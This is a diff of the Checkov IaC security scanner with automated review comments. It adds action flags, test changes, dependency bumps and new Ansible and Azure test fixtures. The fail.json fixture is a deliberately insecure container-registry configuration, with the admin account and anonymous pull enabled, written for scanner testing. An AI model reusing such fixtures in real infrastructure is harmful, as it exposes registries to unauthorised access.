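Review bot: In the entrypoint.sh hunk at `@@ -31,6 +31,7 @@`, `$INPUT_POLICY_METADATA_FILTER_EXCEPTION` is interpolated into `POLICY_METADATA_FILTER_EXCEPTION_FLAG` and the flag is later expanded unquoted on the checkov command line, so a value containing whitespace or glob characters is word-split and glob-expanded by the shell before checkov parses it. This mirrors the existing `POLICY_METADATA_FILTER_FLAG` line, so it is an inherited pattern rather than a new defect, but it is worth documenting since the value originates from an action input rather than from the workflow file itself; I would add `# NOTE: action inputs are expanded unquoted into the checkov argv below; values must not contain spaces or glob characters` above the `[[ -n ... ]]` block. Presumably the new `INPUT_POLICY_METADATA_FILTER_EXCEPTION` variable is only populated when the action's metadata declares a matching input; that file is not in this chunk, so I could not confirm it is updated in the same commit.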
@@ -68,6 +69,10 @@ if [ -n "$INPUT_SKIP_DOWNLOAD" ] && [ "$INPUT_SKIP_DOWNLOAD" = "true" ]; then SKIP_DOWNLOAD_FLAG="--skip-download" fi +if [ -n "$INPUT_DEEP_ANALYSIS" ] && [ "$INPUT_DEEP_ANALYSIS" = "true" ]; then + INPUT_DEEP_ANALYSIS_FLAG="--deep-analysis" +fi + if [ -n "$INPUT_LOG_LEVEL" ]; then export LOG_LEVEL=$INPUT_LOG_LEVEL fi 
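Review bot: The new variable is named `INPUT_DEEP_ANALYSIS_FLAG`, which puts a script-derived value into the `INPUT_` namespace that GitHub reserves for raw action inputs; the neighbouring `SKIP_DOWNLOAD_FLAG` and `OUTPUT_BC_IDS_FLAG` follow the `<NAME>_FLAG` convention without that prefix. I would define it as `if [ "$INPUT_DEEP_ANALYSIS" = "true" ]; then` / `  DEEP_ANALYSIS_FLAG="--deep-analysis"` and rename the two references in the command-building hunk accordingly (the `-n` test is redundant once the value is compared against a non-empty literal). The command-building hunk at `@@ -196,11 +201,11 @@` wires `$INPUT_DEEP_ANALYSIS_FLAG` into the API-key branch, but its `else` branch runs past the end of this chunk, so I could not confirm the flag is also passed when no API key is configured.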
@@ -196,11 +201,11 @@ else fi # Build command if [ -n "$API_KEY_VARIABLE" ]; then - echo "checkov --bc-api-key XXXXXXXXX-XXX-XXXXX --branch $GIT_BRANCH --repo-id $GITHUB_REPOSITORY $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $SKIP_PATH_FLAG" - CHECKOV_RESULTS=$(checkov --bc-api-key $API_KEY_VARIABLE --branch $GIT_BRANCH --repo-id $GITHUB_REPOSITORY $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $SKIP_PATH_FLAG) + echo "checkov --bc-api-key XXXXXXXXX-XXX-XXXXX --branch $GIT_BRANCH --repo-id $GITHUB_REPOSITORY $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG 
$POLICY_METADATA_FILTER_FLAG $POLICY_METADATA_FILTER_EXCEPTION_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $INPUT_DEEP_ANALYSIS_FLAG $SKIP_PATH_FLAG" + CHECKOV_RESULTS=$(checkov --bc-api-key $API_KEY_VARIABLE --branch $GIT_BRANCH --repo-id $GITHUB_REPOSITORY $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $POLICY_METADATA_FILTER_EXCEPTION_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $INPUT_DEEP_ANALYSIS_FLAG $SKIP_PATH_FLAG) else - echo "checkov $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $SKIP_PATH_FLAG" - CHECKOV_RESULTS=$(checkov $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG 
$INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $SKIP_PATH_FLAG) + echo "checkov $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $POLICY_METADATA_FILTER_EXCEPTION_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $INPUT_DEEP_ANALYSIS_FLAG $SKIP_PATH_FLAG" + CHECKOV_RESULTS=$(checkov $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $POLICY_METADATA_FILTER_EXCEPTION_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $INPUT_DEEP_ANALYSIS_FLAG $SKIP_PATH_FLAG) fi fi diff --git a/integration_tests/prepare_data.sh b/integration_tests/prepare_data.sh index 845536a768c..4b8ef8dde66 100755 --- a/integration_tests/prepare_data.sh +++ b/integration_tests/prepare_data.sh 
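Review bot: The argument list now lives in four hand-maintained copies (the masked `echo` and the real invocation in each branch of `if [ -n "$API_KEY_VARIABLE" ]`), and this change had to append `$POLICY_METADATA_FILTER_EXCEPTION_FLAG` and `$INPUT_DEEP_ANALYSIS_FLAG` to every one of them; a flag added to the `echo` but not the invocation, or vice versa, would make the logged command silently differ from the executed one. Building the shared tail once into a bash array and passing it to both `echo` and `checkov` makes the printed and executed commands identical by construction; the sketch below keeps the unquoted `$*_FLAG` expansions, since multi-word flags like `--check $INPUT_CHECK` currently rely on word-splitting, so that part is unchanged. The surrounding outer `if`/`fi` starts before this hunk.
```bash
# … unchanged: flag assignments above …
COMMON_ARGS=(
    $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG
    # … unchanged: the remaining *_FLAG variables, in the existing order …
    $POLICY_METADATA_FILTER_EXCEPTION_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $INPUT_DEEP_ANALYSIS_FLAG $SKIP_PATH_FLAG
)
if [ -n "$API_KEY_VARIABLE" ]; then
    AUTH_ARGS=(--bc-api-key "$API_KEY_VARIABLE" --branch "$GIT_BRANCH" --repo-id "$GITHUB_REPOSITORY")
    echo "checkov --bc-api-key XXXXXXXXX-XXX-XXXXX --branch $GIT_BRANCH --repo-id $GITHUB_REPOSITORY ${COMMON_ARGS[*]}"
else
    AUTH_ARGS=()
    echo "checkov ${COMMON_ARGS[*]}"
fi
CHECKOV_RESULTS=$(checkov "${AUTH_ARGS[@]}" "${COMMON_ARGS[@]}")
```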
@@ -35,7 +35,6 @@ then
 pipenv run checkov -s -d terragoat/terraform/azure/ --repo-id checkov/integration_test --bc-api-key $BC_KEY > checkov_report_azuredir_api_key_terragoat.txt
 pipenv run checkov -s -d terragoat/terraform/azure/ --repo-id checkov/integration_test --skip-results-upload --bc-api-key $BC_KEY > checkov_report_azuredir_api_key_terragoat_no_upload.txt
 echo "running image referencing"
- pipenv run checkov -s -d integration_tests/example_workflow_file/.github/workflows/ -o json --repo-id checkov/integration_test --bc-api-key $BC_KEY --include-all-checkov-policies > checkov_report_workflow_cve.json
 pipenv run checkov -s -d integration_tests/example_workflow_file/bitbucket/ -o json --repo-id checkov/integration_test --bc-api-key $BC_KEY --include-all-checkov-policies > checkov_report_bitbucket_pipelines_cve.json
 echo "running list"
 pipenv run checkov --list --bc-api-key $BC_KEY --output-bc-ids > checkov_checks_list.txt
diff --git a/integration_tests/run_integration_tests.sh b/integration_tests/run_integration_tests.sh
index fe3b247d8d5..02718a798df 100755
--- a/integration_tests/run_integration_tests.sh
+++ b/integration_tests/run_integration_tests.sh
@@ -24,7 +24,6 @@ prepare_data () {
 python checkov/main.py -s -f repositories/terragoat/terraform/aws/s3.tf --repo-id checkov/integration_test --bc-api-key $BC_KEY > checkov_report_s3_singlefile_api_key_terragoat.txt
 python checkov/main.py -s -d repositories/terragoat/terraform/azure/ --repo-id checkov/integration_test --bc-api-key $BC_KEY > checkov_report_azuredir_api_key_terragoat.txt
- python checkov/main.py -s -d integration_tests/example_workflow_file/.github/workflows/ -o json --repo-id checkov/integration_test --bc-api-key $BC_KEY --include-all-checkov-policies > checkov_report_workflow_cve.json
 python checkov/main.py -s -d integration_tests/example_workflow_file/bitbucket/ -o json --repo-id checkov/integration_test --bc-api-key $BC_KEY --include-all-checkov-policies > checkov_report_bitbucket_pipelines_cve.json
 python checkov/main.py --list --bc-api-key $BC_KEY --output-bc-ids > checkov_checks_list.txt
 }
diff --git a/integration_tests/test_checkov_cli_integration_report.py b/integration_tests/test_checkov_cli_integration_report.py
index 5234379ec1f..d29b45fe6bc 100644
--- a/integration_tests/test_checkov_cli_integration_report.py
+++ b/integration_tests/test_checkov_cli_integration_report.py
@@ -28,42 +28,20 @@ def validate_report(self, report_path, url_should_exist=True):
 platform_url_found = True
 self.assertEqual(platform_url_found, url_should_exist, "when using api key and not --skip-results-upload, platform code review url should exist")
- def test_workflow_report_api_key(self):
- report_path = os.path.join(current_dir, '..', 'checkov_report_workflow_cve.json')
- if sys.version_info[1] == 8 and platform.system() == 'Linux':
- with open(report_path, encoding='utf-8') as f:
- reports = json.load(f)
- self.assertGreaterEqual(len(reports), 2,
- "expecting to have 2 reports at least, github_Actions and sca_image")
- github_actions_report_exists = False
- sca_image = False
- for report in reports:
- if report["check_type"] == "github_actions":
- github_actions_report_exists = True
- self.assertGreaterEqual(report['summary']['failed'], 1)
- if report["check_type"] == "sca_image":
- sca_image = True
- self.assertGreaterEqual(report['summary']['failed'], 1)
- self.assertTrue(sca_image)
- self.assertTrue(github_actions_report_exists)
-
 def test_bitbucket_pipelines_report_api_key(self):
 report_path = os.path.join(current_dir, '..', 'checkov_report_bitbucket_pipelines_cve.json')
+ # the below condition exist because checkov_report_bitbucket_pipelines_cve.json is
+ # generated only on Linux with Python 3.8 - see prepare_data.sh script
 if sys.version_info[1] == 8 and platform.system() == 'Linux':
 with open(report_path, encoding='utf-8') as f:
- reports = json.load(f)
- self.assertGreaterEqual(len(reports), 2,
- "expecting to have 2 reports at least, bitbucket_pipelines and sca_image")
+ report = json.load(f)
+ self.assertGreaterEqual(len(report), 1,
+ "expecting to have one report at least - bitbucket_pipelines ")
 bitbucket_pipelines_actions_report_exists = False
- sca_image = False
- for report in reports:
- if report["check_type"] == "bitbucket_pipelines":
- bitbucket_pipelines_actions_report_exists = True
- self.assertGreaterEqual(report['summary']['failed'],
1)
- if report["check_type"] == "sca_image":
- sca_image = True
- self.assertGreaterEqual(report['summary']['failed'], 1)
- self.assertTrue(sca_image)
+ if report["check_type"] == "bitbucket_pipelines":
+ bitbucket_pipelines_actions_report_exists = True
+ self.assertGreaterEqual(report['summary']['failed'], 1)
+ self.assertTrue(bitbucket_pipelines_actions_report_exists)
diff --git a/kubernetes/checkov-job.yaml b/kubernetes/checkov-job.yaml
index b197ded48f4..1595551c117 100644
--- a/kubernetes/checkov-job.yaml
+++ b/kubernetes/checkov-job.yaml
@@ -168,7 +168,6 @@ spec:
 template:
 metadata:
 annotations:
- seccomp.security.alpha.kubernetes.io/pod: runtime/default
 checkov.io/skip1: CKV_K8S_22=Checkov requires filesystem write access to dump resource definitions
 checkov.io/skip2: CKV_K8S_38=Service Account is required for read-only API access
 checkov.io/skip3: CKV_K8S_14=Preferring latest rules every run - image pull always
@@ -177,6 +176,8 @@ spec:
 securityContext:
 runAsUser: 12000
 runAsNonRoot: true
+ seccompProfile:
+ type: RuntimeDefault
 restartPolicy: Never
 serviceAccountName: checkov
 containers:
diff --git a/kubernetes/requirements.txt b/kubernetes/requirements.txt
index 27cb7f54929..1549c3848f9 100644
--- a/kubernetes/requirements.txt
+++ b/kubernetes/requirements.txt
@@ -1 +1 @@
-checkov==3.2.16
+checkov==3.2.214
diff --git a/performance_tests/test_checkov_performance.py b/performance_tests/test_checkov_performance.py
index fd2aef36210..12d7b4cfbe7 100644
--- a/performance_tests/test_checkov_performance.py
+++ b/performance_tests/test_checkov_performance.py
@@ -18,7 +18,7 @@
 'repo_name': 'terraform-aws-components',
 'threshold': {
 "Darwin": 19.0,
- "Linux": 8.0,
+ "Linux": 10.0,
 "Windows": 15.0,
 }
 },
diff --git a/pyproject.toml b/pyproject.toml
index 88a8e7d87d4..6cb700920d4 100644
--- a/pyproject.toml
+++ b/pyproject.toml
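Review bot: The rewritten `test_bitbucket_pipelines_report_api_key` subscripts `report["check_type"]` directly, so it only works when `checkov_report_bitbucket_pipelines_cve.json` holds a single report object; `len(report) >= 1` on that dict counts keys rather than reports, and if the scan ever emits more than one report (the removed code's `for report in reports` loop suggests the JSON is then a list) the subscript raises `TypeError` instead of a readable assertion failure. Normalising the loaded value keeps the old loop shape with two lines: `reports = report if isinstance(report, list) else [report]` followed by `for report in reports:` wrapping the existing `if`. The tail of `validate_report` at the top of the hunk belongs to a method that starts outside it.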
@@ -41,7 +41,6 @@ forbidden_modules = [
 "checkov.policies_3d",
 "checkov.sast",
 "checkov.sca_image",
- "checkov.sca_package",
 "checkov.sca_package_2",
 "checkov.secrets",
 "checkov.serverless",
@@ -61,7 +60,6 @@ ignore_imports = [
 "checkov.common.runners.runner_registry -> checkov.terraform.modules.module_objects", # Should fix usage of get_enriched_resources
 "checkov.common.output.report -> checkov.policies_3d.output", # move to checkov.common.output
- "checkov.common.output.report -> checkov.sca_package.output", # move to checkov.common.output
 "checkov.common.output.report -> checkov.sca_package_2.output", # move to checkov.common.output
 "checkov.common.checks_infra.solvers.connections_solvers.connection_exists_solver -> checkov.terraform.graph_builder.graph_components.block_types", # move to checkov.common.graph.graph_builder.graph_components?
diff --git a/setup.py b/setup.py
index a992eac9ab4..f805fc9b21b 100644
--- a/setup.py
+++ b/setup.py
@@ -66,7 +66,7 @@ def run(self) -> None:
 },
 install_requires=[
 "bc-python-hcl2==0.4.2",
- "bc-detect-secrets==1.5.4",
+ "bc-detect-secrets==1.5.15",
 "bc-jsonpath-ng==1.6.1",
 "pycep-parser==0.4.1",
 "tabulate>=0.9.0,<0.10.0",
@@ -74,40 +74,42 @@ def run(self) -> None:
 "termcolor>=1.1.0,<2.4.0",
 "junit-xml>=1.9,<2.0",
 "dpath==2.1.3",
- "pyyaml>=6.0.0,<7.0.0",
+ "pyyaml<7.0.0,>=6.0.0",
 "boto3==1.34.25",
 "gitpython>=3.1.30,<4.0.0",
 "jmespath>=1.0.0,<2.0.0",
- "tqdm>=4.65.0,<5.0.0",
+ "tqdm<5.0.0,>=4.65.0",
 "packaging>=23.0,<24.0",
- "cloudsplaining>=0.6.2,<0.7.0",
+ "cloudsplaining<0.7.0,>=0.6.2",
 "networkx<2.7",
- "dockerfile-parse>=2.0.0,<3.0.0",
+ "dockerfile-parse<3.0.0,>=2.0.0",
 "docker>=6.0.1,<8.0.0",
 "configargparse>=1.5.3,<2.0.0",
- "argcomplete>=3.0.0,<4.0.0",
- "typing-extensions>=4.5.0,<5.0.0",
+ "argcomplete<4.0.0,>=3.0.0",
+ "typing-extensions<5.0.0,>=4.5.0",
 "importlib-metadata>=6.0.0,<8.0.0",
 "cachetools>=5.2.0,<6.0.0",
- "cyclonedx-python-lib>=6.0.0,<7.0.0",
- "packageurl-python>=0.11.1,<0.14.0",
- "click>=8.1.0,<9.0.0",
- "aiohttp>=3.8.0,<4.0.0",
- "aiodns>=3.0.0,<4.0.0",
+ "cyclonedx-python-lib<7.0.0,>=6.0.0",
+ "packageurl-python<0.14.0,>=0.11.1",
+ "click<9.0.0,>=8.1.0",
+ "aiohttp<4.0.0,>=3.8.0",
+ "aiodns<4.0.0,>=3.0.0",
 "aiomultiprocess>=0.9.0,<0.10.0",
- "jsonschema>=4.17.0,<5.0.0",
- "prettytable>=3.6.0,<4.0.0",
- "charset-normalizer>=3.1.0,<4.0.0",
+ "schema<=0.7.5",
+ "jsonschema<5.0.0,>=4.17.0",
+ "prettytable<4.0.0,>=3.6.0",
+ "charset-normalizer<4.0.0,>=3.1.0",
 "pyston-autoload==2.3.5; python_version < '3.11' and (sys_platform == 'linux' or sys_platform == 'darwin') and platform_machine == 'x86_64' and implementation_name == 'cpython'",
 "pyston==2.3.5; python_version < '3.11' and (sys_platform == 'linux' or sys_platform == 'darwin') and platform_machine == 'x86_64' and implementation_name == 'cpython'",
- "requests>=2.28.0,<3.0.0",
- "yarl>=1.9.1,<2.0.0",
+ "requests<3.0.0,>=2.28.0",
+ "yarl<2.0.0,>=1.9.1",
 "openai<1.0.0",
- "spdx-tools<0.9.0,>=0.8.0",
- "license-expression>=30.1.0,<31.0.0",
+ "spdx-tools>=0.8.0,<0.9.0",
+ "license-expression<31.0.0,>=30.1.0",
 "rustworkx>=0.13.0,<0.14.0",
- "pydantic>=2.0.0,<3.0.0",
- "botocore==1.34.25"
+ 
"pydantic<3.0.0,>=2.0.0",
+ "botocore==1.34.25",
+ "urllib3",
 ],
 dependency_links=[], # keep it empty, needed for pipenv-setup
 license="Apache License 2.0",
@@ -141,6 +143,7 @@ def run(self) -> None:
 "checkov.terraform.checks.graph_checks": ["**/*.json"],
 "checkov.cdk.checks": [
 "python/*.yaml",
+ "typescript/*.yaml",
 ],
 },
 scripts=["bin/checkov", "bin/checkov.cmd"],
diff --git a/tests/ansible/checks/graph_checks/resources/GetUrlHttpsOnly/expected.yaml b/tests/ansible/checks/graph_checks/resources/GetUrlHttpsOnly/expected.yaml
index b4e3c70b99f..53d988ecbf3 100644
--- a/tests/ansible/checks/graph_checks/resources/GetUrlHttpsOnly/expected.yaml
+++ b/tests/ansible/checks/graph_checks/resources/GetUrlHttpsOnly/expected.yaml
@@ -1,5 +1,6 @@
 pass:
 - "tasks.ansible.builtin.get_url.https"
+ - "tasks.get_url.unknown" # update test when variable rendering is supported
 fail:
 - "tasks.get_url.http"
 evaluated_keys:
diff --git a/tests/ansible/checks/graph_checks/resources/GetUrlHttpsOnly/unknown.yaml b/tests/ansible/checks/graph_checks/resources/GetUrlHttpsOnly/unknown.yaml
new file mode 100644
index 00000000000..2e7ab9b9f53
--- /dev/null
+++ b/tests/ansible/checks/graph_checks/resources/GetUrlHttpsOnly/unknown.yaml
@@ -0,0 +1,11 @@
+---
+- name: Verify tests
+ hosts: all
+ vars:
+ variable_url: https://raw.githubusercontent.com/wp-cli/builds/gh-pages/phar/wp-cli.phar
+ tasks:
+ - name: unknown
+ get_url:
+ url: "{{ variable_url }}"
+ dest: /etc/foo.conf
+ force_basic_auth: yes
diff --git a/tests/ansible/test_graph_manager.py b/tests/ansible/test_graph_manager.py
index 037a3193570..6d3909e9d29 100644
--- a/tests/ansible/test_graph_manager.py
+++ b/tests/ansible/test_graph_manager.py
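Review bot: `"urllib3"` is added to `install_requires` with no version specifier while every other entry in the list carries an upper bound, so a future urllib3 major release would be accepted at install time without any change here; `"schema<=0.7.5"` likewise has no lower bound. Bounding it like its neighbours, e.g. `"urllib3<3.0.0,>=1.26.0"` (a constructed example — set the floor to the version actually tested), keeps the resolver off an incompatible major and makes dependency-audit output reproducible. The remaining `-`/`+` pairs in this hunk only reorder specifiers (`>=a,<b` to `<b,>=a`) without changing resolution, which buries the two real additions in cosmetic churn.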
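Review bot: `tasks.get_url.unknown` is listed under `pass`, so a `get_url` whose `url` is the unrendered template `{{ variable_url }}` is reported as compliant; the inline comment says this is pending variable rendering, but until then the check is fail-open for templated URLs and an `http://` value hidden behind a variable is not caught. If the graph-check framework distinguishes an unknown result from a pass, asserting that here would be more truthful; otherwise the comment should state the consequence, e.g. `# provisional: an unrendered url cannot be evaluated, so it is not flagged (see unknown.yaml)`.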
@@ -34,15 +34,17 @@ def test_build_graph_from_definitions():
 assert task.attributes[CustomAttributes.RESOURCE_TYPE] == "tasks.amazon.aws.ec2_instance"
 assert task.attributes[START_LINE] == 11
 assert task.attributes[END_LINE] == 22
- assert task.config == {
- "name": "public-compute-instance",
- "key_name": "prod-ssh-key",
- "vpc_subnet_id": "subnet-5ca1ab1e",
- "instance_type": "c5.large",
- "security_group": "default",
- "network": {"assign_public_ip": True, "__startline__": 19, "__endline__": 20},
- "image_id": "ami-123456",
- "ebs_optimized": True,
- "__startline__": 13,
- "__endline__": 22,
- }
+ assert task.config == {'name': 'enabled',
+ 'amazon.aws.ec2_instance':
+ {'name': 'public-compute-instance',
+ 'key_name': 'prod-ssh-key',
+ 'vpc_subnet_id': 'subnet-5ca1ab1e',
+ 'instance_type': 'c5.large',
+ 'security_group': 'default',
+ 'network': {'assign_public_ip': True, '__startline__': 19, '__endline__': 20},
+ 'image_id': 'ami-123456',
+ 'ebs_optimized': True,
+ '__startline__': 13,
+ '__endline__': 22},
+ '__startline__': 11,
+ '__endline__': 22}
diff --git a/tests/ansible/test_utils.py b/tests/ansible/test_utils.py
index 62ee318aa7e..946f60641ba 100644
--- a/tests/ansible/test_utils.py
+++ b/tests/ansible/test_utils.py
@@ -1,7 +1,7 @@
 from pathlib import Path
 from checkov.ansible.runner import Runner
-from checkov.ansible.utils import build_definitions_context
+from checkov.ansible.utils import build_definitions_context, create_definitions
 EXAMPLES_DIR = Path(__file__).parent / "examples"
@@ -45,3 +45,10 @@ def test_build_definitions_context():
 "suppress_comment": "No comment provided",
 }
 ]
+
+
+def test_create_definitions():
+ definitions, definitions_raw = create_definitions(root_folder=str(EXAMPLES_DIR))
+
+ assert len(definitions) > 0
+ assert all(key.endswith(".yml") or key.endswith(".yaml") and len(value) > 0 for key, value in definitions.items())
\ No newline at end of file
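Review bot: The replacement `task.config` literal is hand-aligned with single quotes and the nested value starting on its own line after `'amazon.aws.ec2_instance':`, a visible departure from the black-style double-quoted literal it replaces; one key per line with the closing braces on their own lines would keep the expected structure readable now that it is two levels deep. The enclosing `test_build_graph_from_definitions` starts outside the hunk.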
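Review bot: In the new `test_create_definitions`, `key.endswith(".yml") or key.endswith(".yaml") and len(value) > 0` parses as `endswith(".yml") or (endswith(".yaml") and len(value) > 0)` because `and` binds tighter than `or`, so an empty definition under a `.yml` file passes the assertion; the intended condition is `key.endswith((".yml", ".yaml")) and len(value) > 0`. `definitions_raw` is unpacked but never asserted on, and the file now ends without a trailing newline.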
diff --git a/tests/arm/checks/resource/example_ACRAdminAccountDisabled/fail.json b/tests/arm/checks/resource/example_ACRAdminAccountDisabled/fail.json new file mode 100644 index 00000000000..da47aaf9839 --- /dev/null +++ b/tests/arm/checks/resource/example_ACRAdminAccountDisabled/fail.json @@ -0,0 +1,37 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.1", + "resources": [ + { + "apiVersion": "2019-05-01", + "type": "Microsoft.ContainerRegistry/registries", + "name": "fail", + "location": "[resourceGroup().location]", + "sku": { + "name": "Basic" + }, + "properties": { + "adminUserEnabled": true, + "anonymousPullEnabled": true, + "dataEndpointEnabled": true, + "encryption": { + "keyVaultProperties": { + "identity": "someIdentity", + "keyIdentifier": "someKeyIdentifier" + }, + "status": "enabled" + }, + "networkRuleBypassOptions": "AzureServices", + "networkRuleSet": { + "defaultAction": "Deny", + "ipRules": [ + { + "action": "Allow", + "value": "127.0.0.1" + } + ] + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_ACRAdminAccountDisabled/pass.json b/tests/arm/checks/resource/example_ACRAdminAccountDisabled/pass.json new file mode 100644 index 00000000000..a415c30602e --- /dev/null +++ b/tests/arm/checks/resource/example_ACRAdminAccountDisabled/pass.json 
